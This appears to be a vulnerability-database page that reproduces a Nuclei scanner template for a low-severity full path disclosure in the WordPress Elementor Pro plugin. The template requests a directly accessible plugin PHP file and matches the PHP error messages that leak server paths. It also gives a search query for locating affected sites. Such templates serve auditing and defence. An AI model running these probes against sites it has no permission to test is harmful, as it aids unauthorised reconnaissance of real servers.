wp-elementor-pro-fpd: WordPress Elementor Pro - Full Path Disclosure

2026-01-16 WordPress Elementor Pro PoC Public

Description

WordPress Plugin Elementor Pro plugin files are publicly accessible without ABSPATH protection, exposing sensitive server path information through PHP error messages when accessed directly.

PoC

id: wp-elementor-pro-fpd

info:
  name: WordPress Elementor Pro - Full Path Disclosure
  author: DhiyaneshDk
  severity: low
  description: |
    WordPress Plugin Elementor Pro plugin files are publicly accessible without ABSPATH protection, exposing sensitive server path information through PHP error messages when accessed directly.
  reference:
    - https://elementor.com/pro/
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/plugins/elementor-pro"
  tags: wp,wordpress,wp-plugin,fpd,elementor-pro,misconfig,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/elementor-pro/modules/notes/notifications/views/email.php"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Fatal error", "Uncaught Error") || contains_all(body, "Warning:", "failed to open stream")'
          - 'status_code == 200 || status_code == 500'
          - 'contains(body, "elementor-pro")'
        condition: and
# digest: 4a0a00473045022100fa2c506d6c22f2b038006f9deeedfcf9bc0074e61c277856608871999a47817d02200b30dcb166c7fc7a7e3aff09007fa5cfdde89b79337ddce820479092c6a80ade:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities